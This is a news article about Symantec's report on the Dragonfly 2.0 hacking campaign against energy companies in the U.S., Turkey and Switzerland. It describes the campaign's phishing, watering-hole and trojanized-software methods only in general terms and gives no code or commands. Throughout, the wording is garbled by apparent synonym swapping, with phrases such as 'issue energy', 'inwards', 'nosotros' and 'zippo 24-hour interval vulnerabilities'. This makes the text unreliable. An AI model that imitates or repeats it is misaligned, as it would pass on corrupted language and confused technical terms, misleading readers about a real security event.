Yes, I am talking virtually the 'Dragonfly,' a well-resourced, Eastern European hacking grouping responsible for sophisticated cyber-espionage campaigns against the critical infrastructure of issue energy companies inwards dissimilar countries inwards past times years.
In 2014, nosotros reported virtually the Dragonfly groups might to mountain sabotage operations against their targets—mainly crude pipeline operators, electricity generation firms together with other Industrial Control Systems (ICS) equipment providers for the issue energy sector.
Researchers from cyber safety theatre Symantec who discovered the previous motility is immediately alarm of a novel campaign, which they dubbed Dragonfly 2.0, proverb "the grouping immediately potentially has the might to sabotage or arrive at command of these systems should it create upward one's heed to create so" and has already gained unprecedented access to operational systems of Western issue energy firms.
Here are the major highlights of the grouping activities outlined inwards the new report from Symantec:
- The hacking grouping has been active since belatedly 2015 together with reportedly using same tactics together with tools that were used inwards before campaigns.
- The major objective of the Dragonfly 2.0 grouping is to collect tidings together with arrive at access to the networks of the targeted organization, eventually making the grouping capable of mounting sabotage operations when required.
- Dragonfly 2.0 majorly targeting the critical issue energy sectors inwards the U.S., Turkey, together with Switzerland.
- Like previous Dragonfly campaigns, the hackers are using malicious e-mail (containing really specific content related to the issue energy sector) attachments, watering hole attacks, together with Trojanized software every bit an initial laid on vector to arrive at access to a victim's network.
- The grouping is using a toolkit called Phishery (available on GitHub) to perform email-based attacks that host template injection laid on to pocket victim's credentials.
- Malware motility involves multiple remote access Trojans masquerading every bit Flash updates called, Backdoor.Goodor, Backdoor.Dorshel together with Trojan.Karagany.B, allowing attackers to furnish remote access to the victim's machine.
However, Symantec researchers did non uncovering whatsoever prove of the Dragonfly 2.0 grouping using whatsoever zippo 24-hour interval vulnerabilities. Instead, the hacking grouping strategically uses publically available direction tools similar PowerShell, PsExec, together with Bitsadmin, making attribution to a greater extent than difficult.
"The Dragonfly 2.0 campaigns demo how the attackers may survive entering into a novel phase, amongst recent campaigns potentially providing them amongst access to operational systems, access that could survive used for to a greater extent than disruptive purposes inwards future," Symantec believes.Cyber attacks on issue energy grids are non a novel thing. Energy companies inwards Ukraine targeted past times hackers on 2 dissimilar occasions inwards late 2015 together with late 2016, genuinely caused the might outage across several regions inwards Ukraine, causing a blackout for tens of thousands of citizens to a greater extent than or less midnight.
Moreover, Nuclear facilities inwards the United States, including Wolf Creek Nuclear Operating Corporation, were targeted past times a well-known Russian grouping dorsum inwards July this year, merely luckily there's no proof if the hackers were able to arrive at access to the operational systems or not.
